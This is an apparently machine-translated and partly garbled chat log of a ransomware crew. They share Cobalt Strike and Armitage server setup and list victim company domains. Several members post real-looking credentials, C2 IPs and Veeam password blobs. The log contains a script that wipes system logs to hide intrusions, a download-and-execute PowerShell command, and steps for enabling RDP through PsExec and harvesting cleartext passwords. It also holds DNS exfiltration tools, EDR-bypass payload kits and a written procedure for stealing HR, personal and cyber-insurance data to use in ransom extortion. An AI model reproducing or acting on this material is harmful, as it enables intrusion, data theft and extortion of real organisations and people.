if you have no tasks - write to me in the meantime - i will find a grid to work hello + kk hello i'm doing mine@twin do arabiq guys what are you doing hello all hello do you not know her? let her go for now what i see but with the first one what do you do the net you passed out i also passed out, but wait a little i can not connect overload probably, should come back no that the rocket stopped working??so who else is out of business and now i'll give you a plus yes come on can you pass something? 195.123.213.122 | 123123098qwepoi | 35464?tvin what are you up to? -twin, what are you up to? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, what's up? -twin, you got the stakanpole + came -titan, alexa, I'll tell you about it now -titan, you got the session -titan, if you can't understand something, feel free, here's @brad, you got it on 3.
108.177.235.22
443main windows/beacon_https/reverse_https 142.202.205.88 443 142.202.205.88pass youdavayip listener + so who on the spot unsubscribe apparently went portdavaybrad ip cobaltauk udesmoxeti stiven will now distribute) do not need to take anything myself = )stev tried to not come I wonder why the networks where to take or wait until it will come?the server is working and configured as from the first day ) if you do not need to change the settings, everything works fine
```
right, working as we did on our servers, no new settings ?
i have a similar setup from day one, so what are you guys doing ?@alter the server is working and configured like from day one ) if i don't have to change the settings, then everything works fine @alex what do you mean "no incoming data" ? i have no incoming data why i have all ok settings on my work servers - everything works fine for everybody ?
@alex finalizes the case on the astronauts then on with @jason - no need to leave unfinished in the old confeno I all helped and explained:grin: so not alone:zany_face:hello tween me no one common was not:rolling_eyes: turns out I was one:confounded:Hello all I have the old networks, with jason, outlet. Well we have there stpornu I have a little was I and jason, but it seems to me in another ти тиmeso old nets like placated "we" is who? it is still unclear at what stage now we in the astronauts still sittingAnd who needs new to workSay, anyone finish old tasks which in the old rocket still remain?:v:alter and brandon hey here guys alter and brandon still wait 10 minutes = )
if it is delayed, i'll be there for him)not enough of a handlercropped by steve all here:v:alex krasaya zdes:smiley:hey hey stakashahi +:rolling_eyes:who do we not have yetubrad hi hi:v:hi broHi everybody:v::point_up:hibradon, herethere ?case is deaddad it was transferred@all
cvmkfDe6Zh7tkWyKwljr2Z80cWSzWSHFTCxPd9OKFgvJsHhVxTdwaTgOd1EUJy12
whose? @all
cwf.fr
d-box.com
groupemontoni.com
owners of these cases - waiting for you@all
unionleader.com
thestaffzone.net
owners of these cases, please let me know how do you download them? do you download them as a packaged archive or just as a diru?
i can explain how to download from msfvenom and use it without tunneling through cobb who can explain how to make a session in msf without vpn-good manualls:thumbsup
i will test@red probably installed it the other way around, but not for sure on Ubuntu it all works yeah, it's better to install the current version@red here i foresee a problem ``apt-get install default-jdk
I showed you above how to set the TC for root, but I don't want to run the timeserver only as a user, here's my guide
1. Install the metasplot
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
; ./msfconsole run the metasplot
2. Install Postgresql
apt-get -y install postgresql
3. Installing Armitage
wget http://fastandeasyhacking.com/download/armitage150813.tgz
tar zxvf armitage150813.tgz
Initialize the metasplot base
msfdb init
; msfdb reinit - Deletes and reinitializes the database.
; msfdb delete - Deletes the database.
; msfdb start - Starts the database.
; msfdb stop - Stops the database.
; msfdb status - Shows the database status.
export MSF_DATABASE_CONFIG=/home/%username%/.msf4/database.yml
5. Launch Armitage Teamserver
cd /path/to/armitage
./teamserver [external IP address] [password]
Useful Links
Installing the Metasploit Framework -
https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/
Armitage installation -
http://www.fastandeasyhacking.com/manual
Required Packages
``````
1. take debian or ubuntu dedic (ssh username@hostname)
Check availability of postgresql
sudo apt install postgresql
sudo apt-get -y install postgresql
============================================================================================================================
2. Download and install the metasplot
x64
wget http://downloads.metasploit.com/data/releases/archive/metasploit-4.16.2-2020011301-linux-x64-installer.run
Next, we modify (allow the scripts to run)
chmod +x metasploit-4.16.2-2020011301-linux-x64-installer.run
chmod +x metasploit-4.13.0-2017022101-linux-x64-installer.run
Далее установка ./metasploit-4.16.2-2020011301-linux-x64-installer.run
https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
============================================================================================================================
Leave all default ports and add a random local domain
domain like addada.com
============================================================================================================================
4. After installing the msf
Installing the editor
sudo apt install nano
Editing scripts 1
nano /etc/init.d/metasploit
#exec /opt/metasploit/ctlscript.sh "$@"
exec /opt/metasploit/postgresql/scripts/ctl.sh "$@"
Editing scripts 2
nano /etc/rc.local add these lines before exit 0
ln -sf /dev/null /var/log/wtmp
ln -sf /dev/null /var/run/utmp
ln -sf /dev/null /var/log/lastlog
ln -sf /dev/null /var/log/auth.log
ln -sf /dev/null /var/log/btmp
ln -sf /dev/null /var/log/dmesg
ln -sf /dev/null /var/log/faillog
ln -sf /dev/null /var/log/kern.log
ln -sf /dev/null /var/log/syslog
ln -sf /dev/null /var/log/user.log
ln -sf /dev/null /var/log/secure
ln -sf /dev/null /root/.bash_history
iptables -A INPUT -i eth0 -p tcp -m tcp --dport 3790 -j DROP
============================================================================================================================
5. Set the java to make the armitage work
apt-get update && apt-get upgrade
apt-get install default-jdk
============================================================================================================================
6. Download and unpack the armitge (toolserver) from this url (tgz archive is up to date)
wget http://fastandeasyhacking.com/download/armitage150813.tgz
tar zxvf armitage150813.tgz
============================================================================================================================
7. Change the port in armitage (before running) in the teamserver script near the end of the file
nano armitage/teamserver
============================================================================================================================
8. Open screen (so that you can run armitage in the background and exit the server), and run
apt-get install screen
launch the screen
cd /root/armitage && ./teamserver IP PASS (the IP of the external interface of the dedicates and the pass is more complex)
============================================================================================================================
9. Wait until everything starts and a message appears with the credentials to armitage, and exit the screen with Ctrl+a and then separately d
============================================================================================================================
10. Change SSH password (passwd root ...)
============================================================================================================================
11. (change ssh port / make authorization by key to the server)
nano /etc/ssh/sshd_config
============================================================================================================================
``mkdir /opt/
cd /opt/
wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip
unzip 4.16.37.zip
mv metasploit-framework-4.16.37 metasploit-framework
sudo chown -R `whoami` /opt/metasploit-framework
cd /opt/metasploit-framework
gem install bundler
bundle install
cd /opt/metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'@atom easily if msf is properly installed
Help me raise the timserver from a normal position. you need a manual on how to raise the timserver, including this manual? but there is a problem with rights, I have not solved it in my own place. armitage guide ``http://www.fastandeasyhacking.com/manual
For 3 years now everyone has been writing on forums about this error with bundler and hems, which is why the java won't connect to you$ gem install bundler
I'll delete it later so it won't clog up the ether with this script
```
This tutorial is for Ubuntu.
the first thing we do is install nano, screen, unzip
sudo apt-get install nano screen unzip
then create file 1.sh:
nano 1.sh
Then insert the code block:
1. installing java (1.sh)
Code:
sudo apt-get update
sudo apt-get -y install --reinstall software-properties-common
sudo apt-get install default-jre
sudo apt-get update
sudo apt-get -y --force-yes install git build-essential unzip libreadline-dev zlib1g-dev nano screen libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
sudo apt-get update
sudo apt-get upgrade
cd ~
git clone git://github.com/sstephenson/rbenv.git
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
then CTRL+X (save) press Y ENTER ENTER
repeat the same for each item
set the rights:
chmod +x 1.sh
run 1.sh:
./1.sh
Now each command is executed in turn
2. installing ruby (2.sh)
Code:
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
3. installing ruby (3.sh)
Code:
RUBYVERSION=2.4.3
rbenv install $RUBYVERSION
rbenv global $RUBYVERSION
ruby -v
4. installing nmap (4.sh)
Code:
mkdir ~/Development
cd ~/Development
git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make
sudo make install
make clean
5. create a database and a database user. execute the commands in turn (without. nano):
Code:
su postgres
cd
createuser msf -P -S -R -D
#enter password qwe31337
createdb -O msf msf
exit
6. installing msf (5.sh)
Code:
mkdir /opt/
cd /opt/
wget https://github.com/rapid7/metasploit-framework/archive/4.16.37.zip
unzip 4.16.37.zip
mv metasploit-framework-4.16.37 metasploit-framework
sudo chown -R `whoami` /opt/metasploit-framework
cd /opt/metasploit-framework
gem install bundler
bundle install
cd /opt/metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
7. installing armitage (6.sh)
Code:
echo cHJvZHVjdGlvbjoNCiBhZGFwdGVyOiBwb3N0Z3Jlc3FsDQogZGF0YWJhc2U6IG1zZg0KIHVzZXJuYW1lOiBtc2YNCiBwYXNzd29yZDogcXdlMzEzMzcNCiBob3N0OiAxMjcuMC4wLjENCiBwb3J0OiA1NDMyDQogcG9vbDogNzUNCiB0aW1Lb3V0OiA1DQo=|base64 --decode > /opt/metasploit-framework/config/database.yml
cd /opt/
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver
After installation, create a screen (to run in the background):
screen -dmS arm
screen -x arm
cd /opt/armitage/
Run ifconfig to check your IP
./teamserver TUT_API_WDSKI TUT_PASSWORD
``You're not clinging to it,`` for some reason your msf is crashing.
[*] Metasploit requires the Bundler gem to be installed
$ gem install bundler
``I don't even know how to comment on this, does it work? Has anyone encountered this error when starting armitage?
[*] Starting RPC daemon
[*] Metasploit requires the Bundler gem to be installed
$ gem install bundler
[*] Sleeping for 20s (to let msfrpcd initialize)
[*] Starting Armitage team server
[*] Warning: checkError(): java.lang.RuntimeException: java.net.ConnectException: Connection refused (Connection refused) at server.sl:450schali it is,yes it puts both armagh and msf on BOX and msf should be on REMOTE BOXhttp://github.com/Matt-London/Install-Armitage-on-Linux what mushrooms are you eating?)))) it does not even need to install) and runs)) 100%armitage simply download) on the site armitage in the instructions are its installationa you armitage or a team serv? no, armitage is not through apt-get installed, and with a guitar if you do not care about the same download, there is armitage `` ``
sudo apt-get install armitage -y
cd Armitage
sudo pip3 install -r requirements.txt
sudo python3 armitage.py
```
like this on ubuntu for example koroche@slice have a suspiciona)most likely he meant the guide script for what? you can write a script yourself install it on wps? a few guys who works with armitage? ms17 - smb port
kerba - ldapfwd and without sox will work you need to throw portsox5 from polzak who started in the local area? very necessary, polzak context, crowdedstrike, 1 yes, you need at least ms17\kerbu\adfind. edr all jammed all ok) what are these numbers?@graf @slice thanksspro key I know about 5 years ago, it was so-so, now I'll try another activation key and cost 10 - 20 dollarsautokms in virustotal vgoniana any other than crack?) trust me a little too little to nimavtokms?:sweat_smile:except directly to activate))) who knows a working way to remove the activation banner windows? @red downloads may not work if the default address assigned to a domain from the Web, and he originally came through tornashel)-@red on the direct - probably because of e2e, disable it in the settings. How do I get the settings to work properly with downloads? Do not work direct-message, ie person writing in direct, he sees the notebook, but when you open the message is not, too, I'm interested in settings where and what to prescribe a servak[ ](https://stylebrooks.com/group/general?msg=Lo2gQrxif7BDytsLt) And this is from the corporation picked up, often found such charts, format ` `.vsdx ` ` and opened through VISIO ` Hey, and you yourself draw a diagram or is there any program? who is online
urgently!acunetix have you got a working one? sorry guys)understood on the "whole forest" it will only go with the wrong settings for the active directory for which you generatebecause it contains a specific domain sidgolden ticket works only in your domain's neprelekh can someone advise on kerberos::golden
created taqet, how now to connect them to the trust host? i will also take a) but later tonight will be) +1there is an urgent need to work@all have hands free? access flew fresh try to remove the backslash from the login, it escapes from this amputation
```
FC944FD5-6FA6-491F-B3AE-055AA04B8DE8 CASTCORP\Veeam_Admin AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380 21857372 2015-11 Veeam_Admin 1 2020-07-29 15:26:43.573
```
I leave only
```
Decrypt("CASTCORP\Veeam_Admin. AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAB44Kw95xZkO6FxCbmQL9XgQAAAACAAAAAAAQZgAAAAEAACAAAAB/fgYimujV08FFVF1HorEMrAbTeP2+007aEVdbUJiq4AAAAAAOgAAAAAIAACAAAAD2X4IEl9UCIkgoq8dV54rX4hc68kJixNPGsZ7ED/SOnSAAAAA7Qhz+33PcMmQaeTlpX8v8TbVrJ4fiHKETkUapmrm3o0AAAADfmyWgvy7k7xVlID5kiZ099vxskNC1MrgIsxxzHeZpSLfA4C/1Sem886hEIuJ5cai/6wRJ/1NzB1A9iBxEP380=");
why is csc.exe veeam.cs not working?
sql manament let's try either raise cobalt session and style token sklservsql manament studio poke the owner of your process "can't" in the subdialog from the context of the untrusted processwho had such an error when decrypting viam ?
```
Msg 916, Level 14, State 1, Server FRVEEAM02\VEEAMSQL2016, Line 1
The server principal "CASTCORP\CASTCJA" is unable to access the database "VeeamBackup" under the current security context.
Ookchutka late) off already Citrix) will be tomorrow) well, let's take it - see what there may be and rdp
there may be an opportunity to call citrix@alter there are cmd or rdp? @all there are willing to take citrixes to work thick? @all sicaf-cosmetiques.fr
i don't see any confinaTransAm Trucking is not our case either? i'm learning it's a startSearch for servers through a domain controller, collect information on AD: users, computers, groupsSearch and sorting users, ipins, search for sharpshoot what? hi there. i've learned how to collect information on cob, call me when something comes up, i will help you. hi, what do you want me to do?hello therevi remember) hello. you write me, don't forget about me don't have anything myself would you like me to do something for the weekendGrimnirCodeocta0dayinbizChucknimbus2000 hello yourself almost without work you sit there hello, can you help me? you got anything for me? hi, we're long with the case if you have any questions - write me
I'll clean up and update the top post later
The regulations of the case and work with data :
1. When the lock is complete, we output the following information to the corresponding confab
https://domain.com
100 Servers 1000 Workstations
Mega:
guerillamailaccount@sharklasers.com
ComPl3xAndh3@vyP@s))91
200 GB (here we specify the amount of data in unzipped form, if it is not clear - mark it COMPRESSED)
COMPANY NAME creates elite transgender sex dolls for the U.S. presidential administration.
2. After that in the near future we put to merge data from the mega and prepare in parallel Data-pack
3. Data-pack is delivered in the following form
full-listing.txt - full listing of all files downloaded from mega
30percentlisting.txt - 30% of full-listing with special emphasis on HR/Finance folders/databases with private information
datapack-example.zip - archive containing files from 30percentlisting.txt with priority on files containing confidential information, scans of documents, HR documents, closed projects of the company (the archive is small, weight 10-30 megabytes)
4. Insurance. In the process of data capture and in the process of their parsing, we are looking for files containing cyber-insurance conditions, standard search tags
cyber
policy
insurance
endorsement
supplementary
underwriting
terms
If such files with the contents of insurance conditions are found - MUST post them separately in the channel at the end of the case, they are an IMPORTANT subject of bargaining.
The presence of files on the network indicating GDPR significantly increases the success of the payment, this is the standard which is adhered to in the storage of user data, for their leakage the company faces significant fines.
Please pay attention to this abbreviation in the process of work and in the process of unloading the file listing and indicate it in the report submission.
5. What data you should pay special attention to
Databases containing information such as: email addresses / names / addresses / payment cards / DOB / SSN / Drivers License (all such databases must be exported and samples of records from these databases are contained in the Data-pack).
Files and databases related to company employees (they almost always contain private information similar to the one described above)
The contents of mail servers (the correspondence is a very strong factor of pressure, unloading of the contents of mail boxes of the administrative level is IMPORTANT, if such is unloaded - it is necessary to mention it separately with a name list of employees and their positions, whose mail archives are unloaded)
Contents of folders Accounting/Finance/HR/Projects/Confidential
Sources of software, if any, developed in the company
6. The data from the mega must be downloaded in its entirety to a dedicated server
``Thank you Redbox, it's blocking via iptables``.
something else needs to be done to make it possible to do all the traffic
```
iptables? : - )@lexman might be useful
```
https://github.com/darkk/redsocks
https://habr.com/en/post/116360/
I got it, thanks, I need something else which will allow to wrap all traffic, instead of a separate progodko about all traffic I do not know, if to wrap in torghost, there is torghost https://github.com/GitHackTools/TorghostNG
You need proxychainz to start your own programs through proxychainz and run them through the terminal:
proxychains4 software_name ..atributes
github:
```
https://github.com/rofl0r/proxychains-ng
```
guide installation
```
https://en.kali.tools/?p=290
How do you wrap all the traffic to a sox/tunnel in it?
proxychains4 (proxychains-ng)
Hi all. Can you suggest a Proxifier analogue for linux I added virtualbox but hoonix can not connect to tor network if not give brandmauer permission on all outgoing connections common profile, I tried to include all rules manually added to brandmauer, all the bases of the network, prescribed ports 9002 and 9030, and still no connection without a common permit I want to prohibit in the firewall all outgoing connections except virtualbox and chrome, so that no one program can not send a single byte https://www.whonix.org/wiki/Other_Operating_Systems Explain what the problem is (are there any hoonix experts?) I can't set up the right firewall rule for hoonix to connect to the network with connections disabled without rules. I've added virtualbox in permissions and enabled all existing rules, explicitly allowed ports 9001 and 9030, but without allowing all outgoing connections for the general profile - doesn't want to connect! Can anyone know what to add to the rules that this stuff would work quite interesting but if no msf - yes ...you already have an encrypted stepping channel open )ntds you can unload and metasplotom )ntds some unload for example) hey, I think when you need to leak a little and no password, this tool can help traffic can be filmed on iplus dns is the default open protocol, it is not encrypted the speed is interesting)it is a fucked up thing most likely)test the speed on the nix, python is only needed can be useful as a substitute for the rclon, and on servers where there is no internet, but the external addresses on the dns are resolved https://darkbyte.net/exfiltrando-informacion-por-dns-con-invoke-dnsteal/
manualhttp://github.com/JoelGMSec/Invoke-DNSteal
the analogue of Rclone implemented through dns transport If so, we'll write ToR to coders, and they will try to finalize it and test it on small networks
if anything does not work - write to me or directly here, we'll figure it outPrecious I do not remember the numbers, but in this build all the useful
kernelexploits ->
MS15-077 - (XP/Vista/Win7/Win8/2000/2003/2008/2012) x86 only!
MS16-032 - (2008/7/8/10/2012)!
MS16-135 - (WS2k16 only)!
CVE-2018-8120 - May 2018, Windows 7 SP1/2008 SP2,2008 R2 SP1!
CVE-2019-0841 - April 2019!
CVE-2019-1069 - Polarbear Hardlink, Credentials needed - June 2019!
CVE-2019-1129/1130 - Race Condition, multiples cores needed - July 2019!
CVE-2019-1215 - September 2019 - x64 only!
CVE-2020-0638 - February 2020 - x64 only!
CVE-2020-0796 - SMBGhost
CVE-2020-0787 - March 2020 - all windows versions
CVE-2021-34527 - July 2021 - PrintNightmare
Juicy-Potato Exploit
itm4ns Printspoofer
``https://github.com/S3cur3Th1sSh1t/WinPwnя got you.'' small nets a couple of times in a week out of 5okay.
I need statistics (roughly, of course), how often zerologon works, for example, if you see that on the ms17 all zatchedoklejka thinga specifically rce / lpe 2020 and 21 years old does anyone in the work use any slots besides ms17? https://github.The registry, I can send you the script when you have 100 machines, it's already a pain in the ass, I also had to remove it through the registry and then reboot the registry
it will not let you locate
1 machine usually can be found without an averter, but through -p \\drygoj_host\c$ does not allow to locatefosos need to remove the handpoint? have the rights of the admin? or an overwriting algorithm in the filemaybe it redmi panes and does not allow to damat good to zadebat what sofos not like massa he will tear it down?signature? a few thousand dollars? on the exploit saw that there is a utility that brings down sofos, but you need to sign the driver, and this is also a kind of gemmornuzhdenu debug
sofos found a way to bypass the bypass? whether or what else it stalls, it does not allow you to screw in the screws with panda also acerttnoe on the automated data drain, but as far as I know it still in the planahalter like ordered some softbro here one way all rests in the human factor and the administrator, his laziness. You can drain 1tb and no one will get off his ass, but you can spill your guts in 10 minutes so there are pros and cons everywhere, but it's better to download through rdp + geolocation too that all this would be automatedNu need to create a cluster of servers through the laying will be normal or write a custom client and pump out somewhere-by the way, the solution - to pump somewhere on the dedic- that plilinu by the way about the mega - that it will banish accounts on any sneeze is expected, It is possible that sooner or later we will come to the fact that it will be impossible to use it at all, as a complaint) can - but banned actors with info - undesirableAA https://mega.nz/cmd has anyone tried?
as a matter of fact it is possible to give commands via kobuzachem it nadprosto can nu ne rigidno)well if you understand it all you probably also understand that there is no ideal way)i saw solutions to limit traffic, like even through the client mega can do to "smear" evenlynos 2 to 4 am will be peak traffic, then quiet
any admin will add 2 +2, and it's no problem to look who and where was leaked from if you leak 100+ gb of traffic at night. imagine how it would look in network admin systems? there the main idea is to camouflage yourself as legitimate traffic backpack to sftp, pack it in a password protected archive and upload it somewhere on fileshare
the best way I do not know better but at a breakage will need to download the connection is not secured by sftp on port 22) well you can put ssl almost all takes on the networka dlp quite a serious thing-plus comrades suggest that if the fftp connection will break the download will be interrupted and everything will have to be unloaded again I do not know which of these is more paleTo make a fundamental difference, you need to open the upload server inside the network (or better to use the existing one) and take the outside dateFor starters, pack the entire date with a password archive, then the system type DLP will not be able to peek and see what you're pumping there, you will see just a big chunk of traffic and all the same traffic goes out to the left domain, whether the domain mega or some otherprincipal difference between the two methods you gave no not so easy all pumped a little, but with the admin wheelbarrow, perhaps more simantickakoy AV ?the idea is that admins can fire on the network traffic, if you downloaded a lot and loaded the channel and could burn, but it's not exactly us can fire, when the balls go from Yes?
The situation is as follows, the session is dead and the host is pinging
Only I accessed balloons and downloaded files from it, no other actions
But not all files downloaded, there was such an error:
[*] started downloading of \\123\\c$\Users\123.pdf (512611 bytes)
[-] download of 123.pdf closed. [Incomplete]write @steven or @hearda suggest cryptocurrencies pailoadconnects stores in logs C:\Program Files\Fortinet\FortiClient\logs
thanks to memory only+connect profile from appdata usually helps with chrome to yank all passages they are tied to ldap as a ruleHi
can you tell me please where FortiClient (fortik vpn) stores the credentials?alex and i'll give you the net now everything is ok nowwoi everything should be ok now re-login i'm not, i have to bother to read your messages maybe i have not enough rights to email you? yeah ok give me the full composition of hell from here guys, from viam i got these creeds login:pass, who can tell me what is it?)
```
8a29ab8d-d896-4e37-a68e-159f49309c4d : 9ecc8be6-38a2-4c48-8c54-147487d9b036
a9b16cb3-2da2-487d-ac15-78fb84432381 : 04d075dc-c459-4607-97e8-d513efb5abeb
``understood ... )anyways sessions re-shoot the kobyd does not matter which one I did not mean it) I have 4.2 kobyd did not download) hello, have you anything to do? or all already downloaded? it does not re-shoottut what? moved? if so - add to the groupI did not even look, but it probably makes sense to look Anybody downloaded the manuals that leaked on the XSS forum? Is there anything useful????аha okche can you think of? I've already tried a million variations and still nothing comes outThough by web domain babelendu some removed house bluepathfinance with domain goodvibsi removed they type "5baftI06a0yitk0SBmQh4T1mip01shZTHVdUPyxDYN0= 1 jkinnen Fordo55! goodvibes" although they are exactly right because they were taken off the same ones the second one will not be correctesonik through extender or the web does not want to take passwordswithout an opinion I'll do it when I come backwrite just a list of ip addresses where you need to rewrite it ok
take it off the day after tomorrow i wrote a list of ipaks 3 hours ago)damn late)@alter this one needs to be reshotasdf7f814vycfasUPDATE: added new patterns for stageless loads@all IMPORTANT
ARTIFACT KIT UPDATE
Everyone download the archive and replace the files in the "over" folder, all files!
The current version of cobalt is patched with a Java hook where the EICAR trial print is removed.
Requires jdk13 on vinda to run :
Add this to the batcnik
@echo off
pushd %~dp0
set PATH="C:\Program Files\Java\jdk-13.0.2\bin\"
To run on Ubuntu :
startup string
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar $*
installing the right Java :
sudo add-apt-repository ppa:linuxuprising/java
sudo apt install oracle-java15-installer
java -version
java version "15.0.1" 2020-10-20
Java(TM) SE Runtime Environment (build 15.0.1+9-18)
Java HotSpot(TM) 64-Bit Server VM (build 15.0.1+9-18, mixed mode, sharing)
For those who have Kali (Debian) :
https://www.linuxuprising.com/2020/09/how-to-install-oracle-java-15-on-ubuntu.html
There will be a section below
Install Oracle Java 15 on Ubuntu, Debian, Linux Mint, Pop!_OS, Zorin OS and others using an APT PPA repository
Included in the package in the folder
Cobalt42_v2/Toolkits/artifact/brooks-artifact-kit/
is artifact.cna, which must be imported into cobalt to generate internal native loads and staged loads to run.
At the moment the situation with the detects is as follows :
https://dyncheck.com/scan/id/eeab696158db737d90da83a0ebf7bc53 - dll x64
https://dyncheck.com/scan/id/f656a34930eb682d6cab252798234f7c - service-exe-x64
https://dyncheck.com/scan/id/32c29f3ba498be4915bb72d4bae824ce - staged payload x64
All of these loads are used not only to manually run the files, but also to jump functionality.
Enjoy, give feedback, wait for updates and patch notes.
Thank you all.
Artifact Kit is used in the following cases :
* Attacks -> Packages -> Windows Executable
* Attacks -> Packages -> Windows Executable (S)
* Attacks -> Web Drive-by -> Scripted Web Delivery (bitsadmin and exe)
* Beacon's 'elevate svc-exe' command
* Beacon's 'jump psexec' and 'jump psexec64' commands
``yeah ok, I'll get it right away@stakan take it for yourself right away``anyone has archives/listings ready for upload from the ones I asked yesterday? wow good how it's done in a minute``?
Make a listing of all in files in a particular archive without unpacking:
7za.exe l "Shared_BUSwine.7z" >> listing12.txt
Make a listing of all in files of all archives in the folder without unpacking:
7za.exe l *.7z >> listing14.txt
``Isn't it clear that botnet broke startup, fix it, 30-40 minutes and it will work freshfat32https://blog.sitedd.ru/archives/53ман for megatools
error not fixed, but started downloading) constantly flies out the error
ERROR: Can't login to mega.nz: API call 'us' failed: Server returned error EEXPIRED
despite the fact that I left the browser more than 10 hours agoanyone used the mega console client megatools?
you need advice i will get up and at 7:30 am Moscow time i will be there at 7:30 pm pm pm pm gentlemen sleep well tomorrow you have three nets under the lock and av to sort out on the end look for files only to download and locate something to do in the morning = )Do not type in the background
i already told you - there will be no problems with the tasks in the near future you have something to do, do not you?
bournesenergy.com 86kk
```
with yes rights, who? who's free? tell me whose server was it?
172.93.105.2
``A VERY handy subdomain searchhttp://raw.githubusercontent.com/Fadavvi/Sub-Drill/master/Sub-Drill.ѕh guys
can somebody give me a shodan account?
fuck yourAuoffline_winpwn.ps1 for machines without internet access, use the commands from the manual after importing ``Import-Module .\WinPwn.ps1
```
or
``iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
``botch) just don't understand any errors or results all does)[ ](https://stylebrooks.com/group/general?msg=R67ManX6WHD3G6NAR) what does it do except do nothing?)[ ](https://stylebrooks.com/group/general?msg=R67ManX6WHD3G6NAR) :innocent:base where the creds are stored, holy of holies)[ ](https://stylebrooks.com/group/general?msg=ne3xJNNSiogD5TEZf) Security Account Manage data@all @altertert what is SAM data? https://github.com/S3cur3Th1sSh1t/WinPwn @all a very solid psh script, there is a nointeractive mod to work with cobalthttp://github.com/GossiTheDog/HiveNightmare@all in testingwho has a guide to how to armitge dedicate?@all working version of BOF compatible with styler, inside there is readme.txt file for review@general please all who use our BOF injector to inject locker into memory write down where it is blocked now for further testing
i will upgrade to a better version to bypass the bypass avr in what could be the problem? the listener is prescribed correctly, the port on the server is not busy works on any windows machine super, this is what you need) yes, you need it) and will it work on the admin station? then any authorization by cmb or rdp in lsass will his cleartext pass if he leaves the server, i will put there and wait until he comes back on, ok?but the bonus is you need to unlogin admin domain or reboot the server if you have a context domain admin can stick through remote register, wdigest key should stick, google guys, you need to steal the password of an admin at the time of entering his password when authorizing on the server, I have a 1 YES, need here go to the server and make the next time the admin came to the server and enter it creds - I got clipass, realistic in general?``reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f ``
Hi guys, could you please tell me how to deal with this... I'm trying to use port 3389 remotely. At the execution of the second command writes such a tip) `` ``
C:\Users\Administrator>PSEXEC.EXE \192.168.3.100 -u glocap.com\chin -p Gustav1!
-s CMD
PsExec v2.32 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:{Windows\system32>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Serv
er" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localpo
rt=3389 action=allowThe operation completed successfully.
C:{Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
A specified value is not valid.
Usage: add rule name=
dir=in|out
action=allow|block|bypass
[program=]
[service=|any]
[description=]
[enable=yes|no (default=yes)
[profile=public|private|domain|any[,.]
[localip=any|||||]
[remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|
||||]
[localport=0-65535|[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=a
ny)]
[remoteport=0-65535|[,...]|any (default=a ny)]
[protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|
tcp|udp|any (default=any)]
[interfacetype=wireless|lan|ras|any]
[rmtcomputergrp=]
[rmtusrgrp=]
[edge=yes|deferapp|deferuser|no (default=no)
[security=authenticate|authenc|authdynenc|authnoencap|notrequired
(default=notrequired)]
Remarks:
- Add a new inbound or outbound rule to the firewall policy.
- The rule name should be unique and cannot be "all".
- If a remote computer or user group is specified, security must be
authenticate, authenc, authdynenc, or authnoencap.
- Setting security to authdynenc allows systems to dynamically
negotiate the use of encryption for traffic that matches
a given Windows Firewall rule. Encryption is negotiated based on
existing connection security rule properties. This option
enables the ability of a machine to accept the first TCP
or UDP packet of an inbound IPsec connection as long as
it is secured, but not encrypted, using IPsec.
Once the first packet is processed, the server will
